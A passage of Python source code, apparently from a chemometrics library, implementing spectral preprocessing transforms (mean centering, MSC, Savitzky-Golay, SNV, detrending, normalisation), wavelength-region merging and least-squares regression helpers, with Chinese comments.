# corr_coeff_denominator = sqrt(np.sum(fit_value_mc ** 2, axis=0) * np.sum(reference_value_mc ** 2, axis=0))
# correlation_coefficient = corr_coeff_numerator / corr_coeff_denominator
# 数据线性回归(横坐标reference_value, 纵坐标predict_value)
# linear_regression_coefficient (2, max_nlv) slope,intercept
linear_regression_coefficient = zeros((2, max_nlv))
for i in range(max_nlv):
reg_coeff = lsr(reference_value, predict_value[:, i], order=1)['regression_coefficient']
linear_regression_coefficient[:, i] = reg_coeff.ravel()
relative_error = np.abs(error) / reference_value
return {'r2': r2, 'rmse': rmse, 'sep':SEP, 'press': press, 'rpd': rpd, 'bias': bias,
'linear_regression_coefficient':linear_regression_coefficient,
'relative_error':relative_error}
def verify_customized_regions(intersect_wavelength, customized_regions, threshold=10):
# +++++++++++++++++++++++ sub_function: used for comparing two list +++++++++++++++++++++++
def _check_region(list1, list2, threshold=10):
list = [list1, list2]
list_sort = sorted([sorted(region) for region in list])
forward_first = list_sort[0][0]
forward_last = list_sort[0][1]
backward_first = list_sort[1][0]
backward_last = list_sort[1][1]
if (backward_last - forward_last) <= 0:
new_list = [list_sort[0]]
elif (backward_first - forward_last) <= 0 or 0 < (backward_first - forward_last) <= threshold:
new_list = [[forward_first, backward_last]]
elif (backward_first - forward_last) > threshold:
new_list = list_sort
return new_list
wavelength_start2end = [intersect_wavelength[0], intersect_wavelength[-1]]
# +++++++++++++++++++++++ merge regions +++++++++++++++++++++++
# step1. sort every region, e.g. [10000, 7000] -> [7000, 10000]
# step2. sort the list, e.g. [[4000, 5000], [7000, 10000], [6000, 8000]] -> [[4000, 5000], [6000, 8000], [7000, 10000]]
region_list_sort = sorted([sorted(region) for region in customized_regions])
n_regions = len(region_list_sort)
merged_list = []
temp_list = [region_list_sort[0]]
if n_regions == 1:
merged_list = region_list_sort
elif n_regions > 1:
for i in range(n_regions - 1):
list1 = temp_list[-1]
list2 = region_list_sort[i + 1] # 从1开始取出
temp_list = _check_region(list1, list2, threshold=threshold)
if len(temp_list) == 2:
merged_list.append(temp_list[0])
merged_list.append(temp_list[-1])
# +++++++++++++++++++++++ validate the merged_list +++++++++++++++++++++++
n_merged_regions = len(merged_list)
valid_region_sort = sorted(wavelength_start2end)
valid_start = valid_region_sort[0]
valid_end = valid_region_sort[1]
verified_regions = []
for j in range(n_merged_regions):
pending_list = merged_list[j]
pending_start = pending_list[0]
pending_end = pending_list[1]
if pending_start > valid_end or pending_end < valid_start:
temp_valid = [valid_start, valid_end]
elif pending_start < valid_start and valid_start < pending_end < valid_end:
temp_valid = [valid_start, pending_end]
elif valid_start < pending_start < valid_end and pending_end > valid_end:
temp_valid = [pending_start, valid_end]
elif pending_start > valid_start and pending_end < valid_end:
temp_valid = pending_list
elif pending_start <= valid_start and pending_end >= valid_end:
temp_valid = [valid_start, valid_end]
else:
temp_valid = [pending_start, pending_end]
verified_regions.append(temp_valid)
if len(verified_regions) == 0:
raise ValueError('选择的谱区与有效谱区不匹配,请重新选择!')
else:
return verified_regions
def generate_variable_indices(intersect_wavelength, customized_regions, threshold=10):
'''
根据各个兼容光谱形成的有效谱区(波长交集),来判断自定义的谱区列表,合并重合部分,舍弃多余部分
:param intersect_wavelength
:param customized_regions: 二层嵌套列表, like [[4000, 5000], [10000, 7000], [6000, 8000]]
:param threshold: cm-1 / nm
:return:
'''
verified_regions = verify_customized_regions(intersect_wavelength, customized_regions, threshold=threshold)
n_valid_regions = len(verified_regions)
indices_list = []
for i in range(n_valid_regions):
valid_region = verified_regions[i]
valid_region_start = valid_region[0]
valid_region_end = valid_region[1]
if intersect_wavelength[0] > valid_region_end or intersect_wavelength[-1] < valid_region_start:
continue
else:
start_index = np.argmin(np.abs(intersect_wavelength - valid_region_start))
end_index = np.argmin(np.abs(intersect_wavelength - valid_region_end))
if valid_region_start < intersect_wavelength[start_index]:
start_index -= 1
if valid_region_end > intersect_wavelength[end_index]:
end_index += 1
indices = np.array(np.arange(start_index, end_index + 1))
indices_list.append(indices)
variable_indices = np.hstack([ind for ind in indices_list]) # 20200321修改成[]
return variable_indices
# +++++++++++++++++++++++++++++++++++++++++++++++ Pretreat Class +++++++++++++++++++++++++++++++++++++++++++++++
# ================ Class 用于光谱矩阵操作、建模、预测过程中转换 ================
# -------- 多样本操作 --------
class MC(object):
'''
Mean Centering 均值中心化
'''
def __init__(self, avg_ab=None):
self.avg_ab = avg_ab
return
def mc(self, spec, avg_ab=None):
wavelength = spec[0, :]
ab = spec[1:, :]
if avg_ab is None:
avg_ab = np.mean(ab, axis=0) # Get the mean of each column
else:
avg_ab = avg_ab
ab_mc = ab - avg_ab # 利用numpy数组的广播法则
spec_mc = np.vstack((wavelength, ab_mc))
return spec_mc
def fit(self, spec):
self.wavelength = spec[0, :]
ab = spec[1:, :]
self.avg_ab = np.mean(ab, axis=0)
return self
def fit_transform(self, spec):
self.wavelength = spec[0, :]
ab = spec[1:, :]
self.avg_ab = np.mean(ab, axis=0)
spec_mc = self.mc(spec, avg_ab=self.avg_ab)
return spec_mc
def transform(self, input_data):
'''
用于当前实例
:param input_data:
:param avg_ab:
:return:
'''
input_wavelength = input_data[0, :]
spec_mc = self.mc(input_data, avg_ab=self.avg_ab)
return spec_mc
def inverse_transform(self, spec_mc, avg_ab=None):
wavelength = spec_mc[0, :]
ab_mc = spec_mc[1:, :]
if avg_ab is None:
ab_ori = ab_mc + self.avg_ab
else:
ab_ori = ab_mc + avg_ab
spec_ori = np.vstack((wavelength, ab_ori))
return spec_ori
class ZS(object):
'''
Zscore Standardization 中心标准化
'''
def __init__(self, avg_ab=None, std_ab=None):
'''
将原数据集各元素减去元素所在列的均值,再除以该列元素的标准差
Centering using the average value, also called mean centering
Scaling involves dividing the (centered) variables by individual measures of dispersion.
Using the Standard Deviation as the scaling factor sets the variance for each variable to one,
and is usually applied after mean centering.
:param avg_ab:
:param std_ab:
'''
self.avg_ab = avg_ab
self.std_ab = std_ab
return
def zs(self, spec, avg_ab=None, std_ab=None):
wavelength = spec[0, :]
ab = spec[1:, :]
if avg_ab is None and std_ab is None:
ab_mean = np.mean(ab, axis=0) # Get the mean of each column
ab_mc = ab - ab_mean
stdev = np.std(ab_mc, axis=0, ddof=1)
ab_zs = ab_mc / stdev
elif avg_ab is not None and std_ab is not None:
ab_mean = avg_ab
ab_mc = ab - ab_mean
stdev = std_ab
ab_zs = ab_mc / stdev
spec_zs = np.vstack((wavelength, ab_zs))
return spec_zs
def fit(self, spec):
self.wavelength = spec[0, :]
ab = spec[1:, :]
self.ab_mean = np.mean(ab, axis=0)
self.ab_std = np.std(ab, axis=0, ddof=1)
return self
def fit_transform(self, spec):
self.wavelength = spec[0, :]
ab = spec[1:, :]
self.ab_mean = np.mean(ab, axis=0)
self.ab_std = np.std(ab, axis=0, ddof=1)
spec_zs = self.zs(spec, avg_ab=self.ab_mean, std_ab=self.ab_std)
return spec_zs
def transform(self, input_data):
input_wavelength = input_data[0, :]
spec_zs = self.zs(input_data, avg_ab=self.ab_mean, std_ab=self.ab_std)
return spec_zs
def inverse_transform(self, spec_as, avg_ab=None, std_ab=None):
wavelength = spec_as[0, :]
ab_zs = spec_as[1:, :]
if avg_ab is None and std_ab is None:
ab_ori = ab_zs * self.ab_std + self.ab_mean
else:
ab_ori = ab_zs * std_ab + avg_ab
spec_ori = np.vstack((wavelength, ab_ori))
return spec_ori
class MSC(object):
'''
Multiplicative Scatter Correction 多元散射校正
'''
def __init__(self, ideal_ab=None):
self.ideal_ab = ideal_ab
return
def msc(self, spec, ideal_ab=None):
wavelength = spec[0, :]
ab = spec[1:, :]
size_of_ab = ab.shape # 10,700
ab_msc = np.zeros(size_of_ab) # 10,700
# 对于校正集外的光谱进行MSC处理时则需要用到校正集样品的平均光谱ab_mean,
# 即首先求取该光谱的c和d, 再进行MSC变换
if ideal_ab is None:
ab_mean = np.mean(ab, axis=0) # 700,
elif len(ideal_ab) != len(np.mean(ab, axis=0)):
raise ValueError('数据点数不一致,输入参数有误!')
else:
ab_mean = ideal_ab
for i in range(size_of_ab[0]): # 求出每条光谱的c和d,c = b[0] d = b[1]
regression_coefficient = lsr(ab_mean, ab[i, :], order=1)['regression_coefficient']
ab_msc[i, :] = (ab[i, :] - regression_coefficient[1]) / regression_coefficient[0] # 利用广播法则
spec_msc = np.vstack((wavelength, ab_msc))
return spec_msc
def fit(self, spec):
self.wavelength = spec[0, :]
ab = spec[1:, :]
self.ideal_ab = np.mean(ab, axis=0)
return self
def fit_transform(self, spec):
self.wavelength = spec[0, :]
ab = spec[1:, :]
self.ideal_ab = np.mean(ab, axis=0)
spec_msc = self.msc(spec, ideal_ab=self.ideal_ab)
return spec_msc
def transform(self, input_data):
input_wavelength = input_data[0, :]
spec_msc = self.msc(input_data, ideal_ab=self.ideal_ab)
return spec_msc
class SGMSC(object):
'''
Savitzky-Golay + Multiplicative Scatter Correction 一阶导 + 多元散射校正
'''
def __init__(self, window_size=11, polyorder=2, deriv=1, ideal_ab=None):
self.window_size = window_size
self.polyorder = polyorder
self.deriv = deriv
self.ideal_ab = ideal_ab
return
def _msc(self, spec, ideal_ab=None):
wavelength = spec[0, :]
ab = spec[1:, :]
size_of_ab = ab.shape # 10,700
ab_msc = np.zeros(size_of_ab) # 10,700
# 对于校正集外的光谱进行MSC处理时则需要用到校正集样品的平均光谱ab_mean,
# 即首先求取该光谱的c和d, 再进行MSC变换
if ideal_ab is None:
ab_mean = np.mean(ab, axis=0) # 700,
elif len(ideal_ab) != len(np.mean(ab, axis=0)):
raise ValueError('数据点数不一致,输入参数有误!')
else:
ab_mean = ideal_ab
d_add = np.ones(size_of_ab[1]) # 700, 线性偏移量offset
matrix_A = (np.vstack((ab_mean, d_add))).T # (700,2)
for i in range(size_of_ab[0]): # 求出每条光谱的c和d,c = b[0] d = b[1]
b = dot(dot(np.linalg.inv(dot(matrix_A.T, matrix_A)), matrix_A.T), ab[i, :])
ab_msc[i, :] = (ab[i, :] - b[1]) / b[0] # 利用广播法则
spec_msc = np.vstack((wavelength, ab_msc))
return spec_msc
def _sg(self, spec, window_size=11, polyorder=2, deriv=1):
'''
:param spec:
:param window_size: must be odd and bigger than 2
:param polyorder: must be bigger than deriv
:param deriv:
:return:
'''
try:
window_size = np.abs(np.int(window_size))
polyorder = np.abs(np.int(polyorder))
except ValueError as msg:
raise ValueError("window_size and polyorder have to be of type int")
if window_size % 2 != 1 or window_size < 2:
raise ValueError("window_size size must be a positive odd number")
if window_size < polyorder: # polyorder must be less than window_size
raise ValueError("window_size is too small for the polynomials polyorder")
if deriv > polyorder: # 'deriv' must be less than or equal to 'polyorder'
raise ValueError("请调小导数阶数!")
n = spec.shape[0] - 1
p = spec.shape[1]
wavelength = spec[0, :]
half_size = window_size // 2
# 计算SG系数
coef = np.zeros((window_size, polyorder + 1))
for i in range(coef.shape[0]):
for j in range(coef.shape[1]):
coef[i, j] = np.power(i - int(window_size / 2), j)
c = dot(inv(dot(coef.T, coef)), coef.T)
# 拷贝SG系数
coefs = np.zeros(window_size) #(11,)
for k in range(window_size):
if deriv == 0 or deriv == 1:
coefs[k] = c[deriv, k]
elif deriv == 2: # 需要调整系数
coefs[k] = c[deriv, k] * 2
elif deriv == 3: # 需要调整系数
coefs[k] = c[deriv, k] * 6
elif deriv == 4: # 需要调整系数
coefs[k] = c[deriv, k] * 24
# 处理吸光度
tempdata = np.zeros((n, p))
ab = spec[1:, :]
for j in range(0, p - window_size + 1):
data_window = ab[:, j:j + window_size]
new_y = dot(data_window, coefs[:, np.newaxis]) # 将coefs增加到二维
tempdata[:, j + half_size] = new_y.ravel()
# 处理两端的数据
for j in range(0, half_size):
tempdata[:, j] = tempdata[:, half_size]
for j in range(p - half_size, p):
tempdata[:, j] = tempdata[:, p - half_size - 1]
# 导数
if deriv > 0:
x_step = wavelength[1] - wavelength[0]
x_step = np.power(x_step, deriv)
ab_sg = tempdata / x_step
else:
ab_sg = tempdata
spec_sg_matrix = np.vstack((wavelength, ab_sg))
return spec_sg_matrix
def sgmsc(self, spec, window_size=11, polyorder=2, deriv=1, ideal_ab=None):
spec_sg = self._sg(spec, window_size=window_size, polyorder=polyorder, deriv=deriv)
spec_sg_msc = self._msc(spec_sg, ideal_ab=ideal_ab)
return spec_sg_msc
def fit(self, spec):
self.wavelength = spec[0, :]
self.ideal_ab = np.mean(spec[1:, :], axis=0)
return self
def fit_transform(self, spec):
spec_sg = self._sg(spec, window_size=self.window_size, polyorder=self.polyorder, deriv=self.deriv)
self.fit(spec_sg)
spec_sg_msc = self._msc(spec_sg, ideal_ab=self.ideal_ab)
return spec_sg_msc
def transform(self, input_data):
input_wavelength = input_data[0, :]
spec_sg = self._sg(input_data, window_size=self.window_size, polyorder=self.polyorder,
deriv=self.deriv)
spec_sg_msc = self._msc(spec_sg, ideal_ab=self.ideal_ab)
return spec_sg_msc
# -------- 单样本操作 --------
class VN(object):
'''
Vector Normalization矢量归一化
'''
def __init__(self):
return
def vn(self, spec):
wavelength = spec[0, :]
ab = spec[1:, :]
ab_vn = ab / np.linalg.norm(ab, axis=1, keepdims=True)
spec_vn = np.vstack((wavelength, ab_vn))
return spec_vn
def fit_transform(self, spec):
self.wavelength = spec[0, :]
spec_vn = self.vn(spec)
return spec_vn
def transform(self, input_data):
input_wavelength = input_data[0, :]
if not (input_wavelength == self.wavelength).all():
raise ValueError('光谱数据不兼容!')
spec_vn = self.vn(input_data)
return spec_vn
class SNV(object):
'''
Standard Normal Variate transformation 标准正态变换
'''
def __init__(self):
return
def snv(self, spec):
wavelength = spec[0, :]
ab = spec[1:, :]
ab_mc = ab - np.mean(ab, axis=1, keepdims=True)
ab_snv = ab_mc / np.std(ab, axis=1, keepdims=True, ddof=1)
spec_snv = np.vstack((wavelength, ab_snv))
return spec_snv
def fit_transform(self, spec):
self.wavelength = spec[0, :]
spec_snv = self.snv(spec)
return spec_snv
def transform(self, input_data):
input_wavelength = input_data[0, :]
if not (input_wavelength == self.wavelength).all():
raise ValueError('光谱数据不兼容!')
spec_vn = self.snv(input_data)
return spec_vn
class ECO(object):
'''
Eliminate Constant Offset 消除常数偏移量(减去各条光谱的最小值,使得最小值变成0)
'''
def __init__(self):
return
def eco(self, spec):
wavelength = spec[0, :]
ab = spec[1:, :]
ab_sco = ab - np.min(ab, axis=1, keepdims=True)
spec_sco = np.vstack((wavelength, ab_sco))
return spec_sco
def fit_transform(self, spec):
self.wavelength = spec[0, :]
spec_eco = self.eco(spec)
return spec_eco
def transform(self, input_data):
input_wavelength = input_data[0, :]
if not (input_wavelength == self.wavelength).all():
raise ValueError('光谱数据不兼容!')
spec_eco = self.eco(input_data)
return spec_eco
class SSL(object):
'''
Subtract Straight Line 减去一条直线
'''
def __init__(self):
return
def ssl(self, spec): # 必须含有波长
wavelength = spec[0, :]
ab = spec[1:, :]
n_samples = ab.shape[0]
ab_ssl = np.zeros(ab.shape)
for i in range(n_samples): # 求出趋势直线
fit_value = lsr(wavelength, ab[i, :], order=1)['fit_value']
ab_ssl[i, :] = ab[i, :] - fit_value.ravel()
spec_ssl = np.vstack((wavelength, ab_ssl))
return spec_ssl
def fit_transform(self, spec):
self.wavelength = spec[0, :]
spec_ssl = self.ssl(spec)
return spec_ssl
def transform(self, input_data):
input_wavelength = input_data[0, :]
if not (input_wavelength == self.wavelength).all():
raise ValueError('光谱数据不兼容!')
spec_ssl = self.ssl(input_data)
return spec_ssl
class DT(object):
'''
De-Trending 去趋势(2次多项式)
'''
def __init__(self):
return
def dt(self, spec): # 必须含有波长
wavelength = spec[0, :]
ab = spec[1:, :]
n_samples = ab.shape[0]
ab_dt = np.zeros(ab.shape)
for i in range(n_samples): # 求出每条光谱的c和d,c = b[0] d = b[1]
fit_value = lsr(wavelength, ab[i, :], order=2)['fit_value']
ab_dt[i, :] = ab[i, :] - fit_value.ravel()
spec_dt = np.vstack((wavelength, ab_dt))
return spec_dt
def fit_transform(self, spec):
self.wavelength = spec[0, :]
spec_dt = self.dt(spec)
return spec_dt
def transform(self, input_data):
input_wavelength = input_data[0, :]
if not (input_wavelength == self.wavelength).all():
raise ValueError('光谱数据不兼容!')
spec_dt = self.dt(input_data)
return spec_dt
class MMN(object): # just used for spectra preprocessing
'''
Min-Max Normalization 最小最大归一化
'''
def __init__(self, norm_min=0, norm_max=1):
self.norm_min = norm_min
self.norm_max = norm_max
return
def mmn(self, spec, norm_min=0, norm_max=1): # min max normalize
wavelength = spec[0, :]
ab = spec[1:, :]
xmin = np.min(ab, axis=1, keepdims=True)
xmax = np.max(ab, axis=1, keepdims=True)
ab_mmn = norm_min + (ab - xmin) * (norm_max - norm_min) / (xmax - xmin)
spec_mmn = np.vstack((wavelength, ab_mmn))
return spec_mmn
def fit_transform(self, spec):
self.wavelength = spec[0, :]
spec_mmn = self.mmn(spec, norm_min=self.norm_min, norm_max=self.norm_max)
return spec_mmn
def transform(self, input_data):
input_wavelength = input_data[0, :]
if not (input_wavelength == self.wavelength).all():
raise ValueError('光谱数据不兼容!')
spec_mmn = self.mmn(input_data, norm_min=self.norm_min, norm_max=self.norm_max)
return spec_mmn
class SG(object):
'''
Savitzky-Golay 平滑与求导
'''
def __init__(self, window_size=11, polyorder=2, deriv=1):
'''
OPUS中polyorder默认为2
:param window_size:
:param polyorder:
:param deriv:
'''
self.window_size = window_size
self.polyorder = polyorder
self.deriv = deriv
return
def sg(self, spec, window_size=11, polyorder=2, deriv=1):
'''
:param spec:
:param window_size: must be odd and bigger than 2
:param polyorder: must be bigger than deriv
:param deriv:
:return:
'''
try:
window_size = np.abs(np.int(window_size))
polyorder = np.abs(np.int(polyorder))
except ValueError as msg:
raise ValueError("window_size and polyorder have to be of type int")
if window_size % 2 != 1 or window_size < 2:
raise ValueError("window_size size must be a positive odd number")
if window_size < polyorder: # polyorder must be less than window_size
raise ValueError("window_size is too small for the polynomials polyorder")
if deriv > polyorder: # 'deriv' must be less than or equal to 'polyorder'
raise ValueError("请调小导数阶数!")
n = spec.shape[0] - 1
p = spec.shape[1]
wavelength = spec[0, :]
half_size = window_size // 2
# 计算SG系数
coef = np.zeros((window_size, polyorder + 1))
for i in range(coef.shape[0]):
for j in range(coef.shape[1]):
coef[i, j] = np.power(i - int(window_size / 2), j)
c = dot(inv(dot(coef.T, coef)), coef.T)
# 拷贝SG系数
coefs = np.zeros(window_size) #(11,)
for k in range(window_size):
if deriv == 0 or deriv == 1:
coefs[k] = c[deriv, k]
elif deriv == 2: # 需要调整系数
coefs[k] = c[deriv, k] * 2
elif deriv == 3: # 需要调整系数
coefs[k] = c[deriv, k] * 6
elif deriv == 4: # 需要调整系数
coefs[k] = c[deriv, k] * 24
# 处理吸光度
tempdata = np.zeros((n, p))
ab = spec[1:, :]
for j in range(0, p - window_size + 1):
data_window = ab[:, j:j + window_size]
new_y = dot(data_window, coefs[:, np.newaxis]) # 将coefs增加到二维
tempdata[:, j + half_size] = new_y.ravel()
# 处理两端的数据
for j in range(0, half_size):
tempdata[:, j] = tempdata[:, half_size]
for j in range(p - half_size, p):
tempdata[:, j] = tempdata[:, p - half_size - 1]
# 导数
if deriv > 0:
x_step = wavelength[1] - wavelength[0]
x_step = np.power(x_step, deriv)
ab_sg = tempdata / x_step
else:
ab_sg = tempdata
spec_sg_matrix = np.vstack((wavelength, ab_sg))
return spec_sg_matrix
def fit_transform(self, spec):
self.wavelength = spec[0, :]
spec_sg = self.sg(spec, self.window_size, self.polyorder, self.deriv)
return spec_sg
def transform(self, input_data):
input_wavelength = input_data[0, :]
if not (input_wavelength == self.wavelength).all():
raise ValueError('光谱数据不兼容!')
spec_sg = self.sg(input_data, self.window_size, self.polyorder, self.deriv)
return spec_sg
class SGSNV(object):
'''
Savitzky-Golay + SNV
'''
def __init__(self, window_size=11, polyorder=2, deriv=1):
self.window_size = window_size
self.polyorder = polyorder
self.deriv = deriv
return
def _snv(self, spec):
wavelength = spec[0, :]
ab = spec[1:, :]
ab_snv = (ab - np.mean(ab, axis=1, keepdims=True)) / np.std(ab, axis=1, keepdims=True, ddof=1)
spec_snv = np.vstack((wavelength, ab_snv))
return spec_snv
def _sg(self, spec, window_size=11, polyorder=2, deriv=1):
'''
:param spec:
:param window_size: must be odd and bigger than 2
:param polyorder: must be bigger than deriv
:param deriv:
:return:
'''
try:
window_size = np.abs(np.int(window_size))
polyorder = np.abs(np.int(polyorder))
except ValueError as msg:
raise ValueError("window_size and polyorder have to be of type int")
if window_size % 2 != 1 or window_size < 2:
raise ValueError("window_size size must be a positive odd number")
if window_size < polyorder: # polyorder must be less than window_size
raise ValueError("window_size is too small for the polynomials polyorder")
if deriv > polyorder: # 'deriv' must be less than or equal to 'polyorder'
raise ValueError("请调小导数阶数!")
n = spec.shape[0] - 1
p = spec.shape[1]
wavelength = spec[0, :]
half_size = window_size // 2
# 计算SG系数
coef = np.zeros((window_size, polyorder + 1))
for i in range(coef.shape[0]):
for j in range(coef.shape[1]):
coef[i, j] = np.power(i - int(window_size / 2), j)
c = dot(inv(dot(coef.T, coef)), coef.T)
# 拷贝SG系数
coefs = np.zeros(window_size) #(11,)
for k in range(window_size):
if deriv == 0 or deriv == 1:
coefs[k] = c[deriv, k]
elif deriv == 2: # 需要调整系数
coefs[k] = c[deriv, k] * 2
elif deriv == 3: # 需要调整系数
coefs[k] = c[deriv, k] * 6
elif deriv == 4: # 需要调整系数
coefs[k] = c[deriv, k] * 24
# 处理吸光度
tempdata = np.zeros((n, p))
ab = spec[1:, :]
for j in range(0, p - window_size + 1):
data_window = ab[:, j:j + window_size]
new_y = dot(data_window, coefs[:, np.newaxis]) # 将coefs增加到二维
tempdata[:, j + half_size] = new_y.ravel()
# 处理两端的数据
for j in range(0, half_size):
tempdata[:, j] = tempdata[:, half_size]
for j in range(p - half_size, p):
tempdata[:, j] = tempdata[:, p - half_size - 1]
# 导数
if deriv > 0:
x_step = wavelength[1] - wavelength[0]
x_step = np.power(x_step, deriv)
ab_sg = tempdata / x_step
else:
ab_sg = tempdata
spec_sg_matrix = np.vstack((wavelength, ab_sg))
return spec_sg_matrix
def sgsnv(self, spec, window_size=11, polyorder=2, deriv=1):
spec_sg = self._sg(spec, window_size=window_size, polyorder=polyorder, deriv=deriv)
spec_sg_snv = self._snv(spec_sg)
return spec_sg_snv
def fit_transform(self, spec):
self.wavelength = spec[0, :]
spec_sg = self._sg(spec, window_size=self.window_size, polyorder=self.polyorder, deriv=self.deriv)
spec_sg_snv = self._snv(spec_sg)
return spec_sg_snv
def transform(self, input_data):
input_wavelength = input_data[0, :]
if not (input_wavelength == self.wavelength).all():
raise ValueError('光谱数据不兼容!')
spec_sg = self._sg(input_data, window_size=self.window_size, polyorder=self.polyorder, deriv=self.deriv)
spec_sg_snv = self._snv(spec_sg)
return spec_sg_snv
class SNVDT(object):
'''
SNV + DT
'''
def __init__(self):
return
def _snv(self, spec):
wavelength = spec[0, :]
ab = spec[1:, :]
ab_snv = (ab - np.mean(ab, axis=1, keepdims=True)) / np.std(ab, axis=1, keepdims=True, ddof=1)
spec_snv = np.vstack((wavelength, ab_snv))
return spec_snv
def _dt(self, spec): # 必须含有波长
wavelength = spec[0, :]
ab = spec[1:, :]
n_samples = ab.shape[0]
ab_dt = np.zeros(ab.shape)
for i in range(n_samples): # 求出每条光谱的c和d,c = b[0] d = b[1]
fit_value = lsr(wavelength, ab[i, :], order=2)['fit_value']
ab_dt[i, :] = ab[i, :] - fit_value.ravel()
spec_dt = np.vstack((wavelength, ab_dt))
return spec_dt
def snvdt(self, spec):
spec_snv = self._snv(spec)
spec_snv_dt = self._dt(spec_snv)
return spec_snv_dt
def fit_transform(self, spec):
self.wavelength = spec[0, :]
spec_snv = self._snv(spec)
spec_snv_dt = self._dt(spec_snv)
return spec_snv_dt
def transform(self, input_data):
input_wavelength = input_data[0, :]
if not (input_wavelength == self.wavelength).all():
raise ValueError('光谱数据不兼容!')
spec_snv = self._snv(input_data)
spec_snv_dt = self._dt(spec_snv)
return spec_snv_dt
class SGSSL(object):
'''
SG + SSL 求导 + 减去一条直线
'''
def __init__(self, window_size=11, polyorder=2, deriv=1):
self.window_size = window_size
self.polyorder = polyorder
self.deriv = deriv
return
def _ssl(self, spec): # 必须含有波长
size_of_spec = spec.shape # 第一行是x轴
wavelength = spec[0, :]
spec_ssl = np.zeros(size_of_spec)
spec_ssl[0, :] = wavelength
f_add = np.ones(size_of_spec[1]) # 用于构造A
matrix_A = (np.vstack((wavelength, f_add))).T # 2126 * 2
for i in range(1, size_of_spec[0]): # 从1开始,不算wavelength
r = dot(dot(np.linalg.inv(dot(matrix_A.T, matrix_A)), matrix_A.T), spec[i, :])
spec_ssl[i, :] = spec[i, :] - dot(matrix_A, r)
return spec_ssl
def _sg(self, spec, window_size=11, polyorder=2, deriv=1):
'''
:param spec:
:param window_size: must be odd and bigger than 2
:param polyorder: must be bigger than deriv
:param deriv:
:return:
'''
try:
window_size = np.abs(np.int(window_size))
polyorder = np.abs(np.int(polyorder))
except ValueError as msg:
raise ValueError("window_size and polyorder have to be of type int")
if window_size % 2 != 1 or window_size < 2:
raise ValueError("window_size size must be a positive odd number")
if window_size < polyorder: # polyorder must be less than window_size
raise ValueError("window_size is too small for the polynomials polyorder")
if deriv > polyorder: # 'deriv' must be less than or equal to 'polyorder'
raise ValueError("请调小导数阶数!")
n = spec.shape[0] - 1
p = spec.shape[1]
wavelength = spec[0, :]
half_size = window_size // 2
# 计算SG系数
coef = np.zeros((window_size, polyorder + 1))
for i in range(coef.shape[0]):
for j in range(coef.shape[1]):
coef[i, j] = np.power(i - int(window_size / 2), j)
c = dot(inv(dot(coef.T, coef)), coef.T)
# 拷贝SG系数
coefs = np.zeros(window_size) #(11,)
for k in range(window_size):
if deriv == 0 or deriv == 1:
coefs[k] = c[deriv, k]
elif deriv == 2: # 需要调整系数
coefs[k] = c[deriv, k] * 2
elif deriv == 3: # 需要调整系数
coefs[k] = c[deriv, k] * 6
elif deriv == 4: # 需要调整系数
coefs[k] = c[deriv, k] * 24
# 处理吸光度
tempdata = np.zeros((n, p))
ab = spec[1:, :]
for j in range(0, p - window_size + 1):
data_window = ab[:, j:j + window_size]
new_y = dot(data_window, coefs[:, np.newaxis]) # 将coefs增加到二维
tempdata[:, j + half_size] = new_y.ravel()
# 处理两端的数据
for j in range(0, half_size):
tempdata[:, j] = tempdata[:, half_size]
for j in range(p - half_size, p):
tempdata[:, j] = tempdata[:, p - half_size - 1]
# 导数
if deriv > 0:
x_step = wavelength[1] - wavelength[0]
x_step = np.power(x_step, deriv)
ab_sg = tempdata / x_step
else:
ab_sg = tempdata
spec_sg_matrix = np.vstack((wavelength, ab_sg))
return spec_sg_matrix
def sgssl(self, spec, window_size=11, polyorder=2, deriv=1):
spec_sg = self._sg(spec, window_size=window_size, polyorder=polyorder, deriv=deriv)
spec_sg_ssl = self._ssl(spec_sg)
return spec_sg_ssl
def fit_transform(self, spec):
self.wavelength = spec[0, :]
spec_sg = self._sg(spec, window_size=self.window_size, polyorder=self.polyorder, deriv=self.deriv)
spec_sg_ssl = self._ssl(spec_sg)
return spec_sg_ssl
def transform(self, input_data):
input_wavelength = input_data[0, :]
if not (input_wavelength == self.wavelength).all():
raise ValueError('光谱数据不兼容!')
spec_sg = self._sg(input_data, window_size=self.window_size, polyorder=self.polyorder, deriv=self.deriv)
spec_sg_ssl = self._ssl(spec_sg)
return spec_sg_ssl
# +++++++++++++++ Used for data +++++++++++++++
class MC4Data(object):
def __init__(self, avg_data=None):
self.avg_data = avg_data
return
def mc4data(self, data, avg_data=None):
if avg_data is None:
data_mean = np.mean(data, axis=0, keepdims=True)
elif avg_data is not None:
data_mean = avg_data
data_mc = data - data_mean
return data_mc
def fit(self, data):
self.avg_data = np.mean(data, axis=0, keepdims=True)
return self
def fit_transform(self, data):
self.avg_data = np.mean(data, axis=0, keepdims=True)
data_mc = self.mc4data(data, avg_data=self.avg_data)
return data_mc
def transform(self, input_data):
data_mc = self.mc4data(input_data, avg_data=self.avg_data)
return data_mc
def inverse_transform(self, data_mc):
data_ori = data_mc + self.avg_data
return data_ori
class ZS4Data(object):
def __init__(self, avg_data=None, std_data=None):
self.avg_data = avg_data
self.std_data = std_data
return
def zs4data(self, data, avg_data=None, std_data=None):
if avg_data is None and std_data is None:
data_mean = np.mean(data, axis=0) # Get the mean of each column
data_mc = data - data_mean
data_stdev = np.std(data_mc, axis=0, ddof=1)
data_zs = data_mc / data_stdev
elif avg_data is not None and std_data is not None:
data_mean = avg_data
data_mc = data - data_mean
data_stdev = std_data
data_zs = data_mc / data_stdev
return data_zs
def fit(self, data):
self.avg_data = np.mean(data, axis=0, keepdims=True)
data_mc = data - self.avg_data
self.std_data = np.std(data_mc, axis=0, ddof=1)
return self
def fit_transform(self, data):
self.avg_data = np.mean(data, axis=0, keepdims=True)
data_mc = data - self.avg_data
self.std_data = np.std(data_mc, axis=0, ddof=1)
data_zs = self.zs4data(data, avg_data=self.avg_data, std_data=self.std_data)
return data_zs
def transform(self, input_data):
data_zs = self.zs4data(input_data, avg_data=self.avg_data, std_data=self.std_data)
return data_zs
def inverse_transform(self, data_zs):
data_ori = data_zs * self.std_data + self.avg_data
return data_ori
# +++++++++++++++ Function 用于最小二乘回归 +++++++++++++++
def generate_polynomial(X, order=1):
if X.ndim == 1:
X = X[:, np.newaxis] # 如果一维数组,转成二维
n_samples, n_variables = X.shape
intercept = np.ones((n_samples, 1)) # offset 截距
A = np.hstack((X, intercept))
if order > 1:
# 高次 ----> 低次
for i in range(2, order+1): # order==2
s = X ** i
A = np.hstack((s, A))
return A
def lsr(X, y, order=1): # 默认1次
'''
Least Square Regression 最小二乘回归
:param X:
:param y:
:param order: 1,2,3... 适应多项式回归
:return:
regression_coefficient -
